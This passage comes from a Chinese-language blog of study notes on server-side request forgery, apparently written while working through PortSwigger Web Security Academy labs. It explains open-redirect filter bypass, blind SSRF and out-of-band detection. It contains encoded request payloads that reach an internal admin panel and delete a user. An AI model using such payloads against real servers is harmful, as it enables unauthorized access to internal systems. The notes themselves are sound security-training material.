<h3 id="Bypassing-SSRF-filters-via-open-redirection"><a href="#Bypassing-SSRF-filters-via-open-redirection" class="headerlink" title="Bypassing SSRF filters via open redirection"></a>Bypassing SSRF filters via open redirection</h3><p>如果应用的api存在重定向漏洞，就可以构建一个满足过滤规则，最终重定向到target的URL，来利用。</p>
<p>举例 ：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/product/nextProduct?currentProductId=6&amp;path=http://evil-user.net</span><br></pre></td></tr></table></figure>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/product/stock</span> <span class="meta">HTTP/1.0</span></span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>118</span><br><span class="line"></span><br><span class="line"><span class="language-awk">stockApi=http:<span class="regexp">//</span>weliketoshop.net<span class="regexp">/product/</span>nextProduct?currentProductId=<span class="number">6</span>&amp;path=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">0.68</span>/admin</span></span><br></pre></td></tr></table></figure>
<p>这种情况能通过过滤，是因为：应用首先检验提交的<code>stockAPI</code>是在一个允许的域上。</p>
<h4 id="Lab-SSRF-with-filter-bypass-via-open-redirection-vulnerability"><a href="#Lab-SSRF-with-filter-bypass-via-open-redirection-vulnerability" class="headerlink" title="Lab: SSRF with filter bypass via open redirection vulnerability"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf">SSRF</a> with filter bypass via open redirection vulnerability</h4><ol>
<li>这里看到<code>stockApi=%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1</code>,我初步的想法是像上述一样，加个<code>&amp;path=</code></li>
<li>结果是正常查询，看起来后端并没有解析<code>path</code>参数。</li>
<li>看了solution后，我意识到我找错了地方，<code>Check stock</code>并没有相应的open redirection vulnerability , 而是在<code>next product</code></li>
<li>这里看到<code>next product</code>包<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/product/nextProduct?currentProductId=1&amp;path=/product?productId=2</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a7800870442333983d36f8000e800f3.web-security-academy.net</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>session=zeo9BMgCcN4bjQC9fjrolDifIF0bKfmA; session=FllaMdiROXA8bis59Av3ZhGZwIbkHzVg</span><br><span class="line"><span class="attribute">Sec-Ch-Ua</span><span class="punctuation">: </span>&quot;Chromium&quot;;v=&quot;122&quot;, &quot;Not(A:Brand&quot;;v=&quot;24&quot;, &quot;Google Chrome&quot;;v=&quot;122&quot;</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Platform</span><span class="punctuation">: </span>&quot;Linux&quot;</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://0a7800870442333983d36f8000e800f3.web-security-academy.net/product?productId=1</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br></pre></td></tr></table></figure></li>
<li>可以看到这里是存在一个<code>path</code>参数的。</li>
<li><del>构建新的参数</del><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/product/nextProduct?currentProductId=1&amp;path=http://192.168.0.12:8080/admin</span> <span class="meta">HTTP/2</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>哥们在写完之后的下午上网站一看，发现后边都没有？震惊了，看来这个用HTML实现多行注释不咋地行</p>
</blockquote>
</li>
<li>我意识到我的问题了，我应当修改<code>stockApi</code>, 从而利用<code>/product/nextProduct</code>来实现重定向。而非是直接使用<code>GET</code>去请求，这样是没法绕过的。</li>
<li>构建相应<code>POST</code> request<br><code>stockApi=%2fproduct%2fnextProduct%3fpath%3dhttp%3a%2f%2f192.168.0.12%3a8080%2fadmin</code></li>
<li>成功访问管理界面</li>
<li><code>stockApi=%2fproduct%2fnextProduct%3fpath%3dhttp%3a%2f%2f192.168.0.12%3a8080%2fadmin%2fdelete%3fusername%3dcarlos</code>构建相应 request即可</li>
</ol>
<h2 id="Blind-SSRF-vulnerabilities"><a href="#Blind-SSRF-vulnerabilities" class="headerlink" title="Blind SSRF vulnerabilities"></a>Blind SSRF vulnerabilities</h2><p>^69fef6</p>
<p>我理解的是，跟sql盲注一样，能执行，但不给你返回response。这种类型的漏洞很难利用（这一点也跟SQLi差不对么），但是有时会导致RCE。</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf/blind">Finding and exploiting blind SSRF vulnerabilities</a></li>
</ul>
<h2 id="Finding-hidden-attack-surface-for-SSRF-vulnerabilities"><a href="#Finding-hidden-attack-surface-for-SSRF-vulnerabilities" class="headerlink" title="Finding hidden attack surface for SSRF vulnerabilities"></a>Finding hidden attack surface for SSRF vulnerabilities</h2><p>大多数SSRF漏洞都容易发现。但也有一些比较难定位的：</p>
<h3 id="Partial-URLs-in-requests"><a href="#Partial-URLs-in-requests" class="headerlink" title="Partial URLs in requests"></a>Partial URLs in requests</h3><p>这种就是只在request参数中放hostname或者部分URL，到服务端再拼接成完整的。因为没办法控制整个URL，所以可能有点难利用。</p>
<h3 id="URLs-within-data-formats"><a href="#URLs-within-data-formats" class="headerlink" title="URLs within data formats"></a>URLs within data formats</h3><p>一些应用可能采用特定的格式传输URL，比方说XML。如果用XML格式的话，可能就存在 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/xxe">XXE injection</a>漏洞。</p>
<h3 id="SSRF-via-the-Referer-header"><a href="#SSRF-via-the-Referer-header" class="headerlink" title="SSRF via the Referer header"></a>SSRF via the Referer header</h3><p>一些应用在服务端会有分析软件来记录访客。这些软件通常会记录请求中的Referer头，而且通常会访问Referer头中的任意第三方URL，以此分析这些网站的内容。因此，Referer头就可能是一个非常有效的SSRF攻击面。</p>
<h1 id="Blind-SSRF-vulnerabilities-1"><a href="#Blind-SSRF-vulnerabilities-1" class="headerlink" title="Blind SSRF vulnerabilities"></a>Blind SSRF vulnerabilities</h1><h2 id="What-is-blind-SSRF"><a href="#What-is-blind-SSRF" class="headerlink" title="What is blind SSRF?"></a>What is blind SSRF?</h2><p>[[#^69fef6]]</p>
<h2 id="What-is-the-impact-of-blind-SSRF-vulnerabilities"><a href="#What-is-the-impact-of-blind-SSRF-vulnerabilities" class="headerlink" title="What is the impact of blind SSRF vulnerabilities?"></a>What is the impact of blind SSRF vulnerabilities?</h2><blockquote>
<p>The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF vulnerabilities because of their one-way nature.</p>
</blockquote>
<p>哦，影响是不如“fully informed”，虽然有些情况下可以实现RCE，但是没办法泄露敏感信息。</p>
<h2 id="How-to-find-and-exploit-blind-SSRF-vulnerabilities"><a href="#How-to-find-and-exploit-blind-SSRF-vulnerabilities" class="headerlink" title="How to find and exploit blind SSRF vulnerabilities"></a>How to find and exploit blind SSRF vulnerabilities</h2><p>探测blind SSRF漏洞最可靠的方式是，使用<code>out-of-band</code><a target="_blank" rel="noopener" href="https://portswigger.net/burp/application-security-testing/oast">OAST</a>技术。就是想办法向攻击者控制的外部系统发送HTTP请求。</p>
<p>它这里推荐了一个 <a target="_blank" rel="noopener" href="https://portswigger.net/burp/documentation/collaborator">Burp Collaborator</a> ， 可以生成唯一的域名，payloads， 监控与域名的交互活动。</p>
<blockquote>
<p>这里还提到一个特征是：观察到DNS look-up， 但是没有后续的HTTP请求。这就表示，应用试图发送request，然后就先DNS lookup，但是HTTP request被network-level filtering过滤掉了。</p>
</blockquote>
<p>由于这个“blind”，所以没法去浏览系统上的内容。但是可以用blind SSRF去进一步地探测内部网络，尝试去发送一些波及范围比较广的其它漏洞的payload。</p>
<p>另一个利用blind SSRF漏洞的目的就是去，诱导应用连接到攻击者控制的系统，然后攻击者借此返回恶意response。</p>
<h4 id="Lab-Blind-SSRF-with-out-of-band-detection"><a href="#Lab-Blind-SSRF-with-out-of-band-detection" class="headerlink" title="Lab: Blind SSRF with out-of-band detection"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf/blind">Blind SSRF</a> with out-of-band detection</h4><p>这个就是上述的referer类型[[#SSRF via the Referer header ]]，这个实验室也是利用Burp Collaborator的。</p>
<ol>
<li>这个连<code>checkstock</code>都没有</li>
<li>截获查看产品的<code>GET</code>request，送去repeater，选中<code>Referer</code>，右键<code>Insert Collaborator Payload</code> , 然后发送</li>
<li>去<code>collaborator</code>查看，结果我啥也没看到。emmm，看了下event log，觉得是不是我没挂代理的问题。</li>
<li>上设置里跑了个health check，结果全红。把代理那边<code>do dns lookups over socks proxy</code>选上了，解决了一些问题，但是SMTP connection 还是会报错。</li>
<li>按理说这也不应该啥都搜不到？这个lab也用不到smtp啊</li>
<li>看了community solution ,也没法发现自己怎么不对。以后有机会自建collaborator 再试试把。</li>
</ol>
<h4 id="Lab-Blind-SSRF-with-Shellshock-exploitation"><a href="#Lab-Blind-SSRF-with-Shellshock-exploitation" class="headerlink" title="Lab: Blind SSRF with Shellshock exploitation"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf/blind">Blind SSRF</a> with Shellshock exploitation</h4><p>也是会用到<code>collaborator</code>，直接不做了。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/91Quin">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-SSRF"><span class="toc-number">1.</span> <span class="toc-text">What is SSRF?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-the-impact-of-SSRF-attacks"><span class="toc-number">2.</span> <span class="toc-text">What is the impact of SSRF attacks?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Common-SSRF-attacks"><span class="toc-number">3.</span> <span class="toc-text">Common SSRF attacks</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-attacks-against-the-server"><span class="toc-number">3.1.</span> <span class="toc-text">SSRF attacks against the server</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Basic-SSRF-against-the-local-server"><span class="toc-number">3.1.1.</span> <span class="toc-text">Lab: Basic SSRF against the local server</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-attacks-against-other-back-end-systems"><span class="toc-number">3.2.</span> <span class="toc-text">SSRF attacks against other back-end systems</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Basic-SSRF-against-another-back-end-system"><span class="toc-number">3.2.1.</span> <span class="toc-text">Lab: Basic SSRF against another back-end system</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Circumventing-common-SSRF-defenses"><span class="toc-number">4.</span> <span class="toc-text">Circumventing common SSRF defenses</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-with-blacklist-based-input-filters"><span class="toc-number">4.1.</span> <span class="toc-text">SSRF with blacklist-based input filters</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-blacklist-based-input-filter"><span class="toc-number">4.1.1.</span> <span class="toc-text">Lab: SSRF with blacklist-based input filter</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-with-whitelist-based-input-filters"><span class="toc-number">4.2.</span> <span class="toc-text">SSRF with whitelist-based input filters</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-whitelist-based-input-filter"><span class="toc-number">4.2.1.</span> <span class="toc-text">Lab: SSRF with whitelist-based input filter</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypassing-SSRF-filters-via-open-redirection"><span class="toc-number">4.3.</span> <span class="toc-text">Bypassing SSRF filters via open redirection</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-filter-bypass-via-open-redirection-vulnerability"><span class="toc-number">4.3.1.</span> <span class="toc-text">Lab: SSRF with filter bypass via open redirection vulnerability</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Blind-SSRF-vulnerabilities"><span class="toc-number">5.</span> <span class="toc-text">Blind SSRF vulnerabilities</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Finding-hidden-attack-surface-for-SSRF-vulnerabilities"><span class="toc-number">6.</span> <span class="toc-text">Finding hidden attack surface for SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Partial-URLs-in-requests"><span class="toc-number">6.1.</span> <span class="toc-text">Partial URLs in requests</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#URLs-within-data-formats"><span class="toc-number">6.2.</span> <span class="toc-text">URLs within data formats</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-via-the-Referer-header"><span class="toc-number">6.3.</span> <span class="toc-text">SSRF via the Referer header</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Blind-SSRF-vulnerabilities-1"><span class="toc-number"></span> <span class="toc-text">Blind SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-blind-SSRF"><span class="toc-number">1.</span> <span class="toc-text">What is blind SSRF?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-the-impact-of-blind-SSRF-vulnerabilities"><span class="toc-number">2.</span> <span class="toc-text">What is the impact of blind SSRF vulnerabilities?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-to-find-and-exploit-blind-SSRF-vulnerabilities"><span class="toc-number">3.</span> <span class="toc-text">How to find and exploit blind SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Blind-SSRF-with-out-of-band-detection"><span class="toc-number">3.0.1.</span> <span class="toc-text">Lab: Blind SSRF with out-of-band detection</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Blind-SSRF-with-Shellshock-exploitation"><span class="toc-number">3.0.2.</span> <span class="toc-text">Lab: Blind SSRF with Shellshock exploitation</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&text=Server-side request forgery (SSRF)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&is_video=false&description=Server-side request forgery (SSRF)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Server-side request forgery (SSRF)&body=Check out this article: https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&name=Server-side request forgery (SSRF)&description=&lt;p&gt;服务端请求伪造&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&t=Server-side request forgery (SSRF)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2025
    Yijian
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/91Quin">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
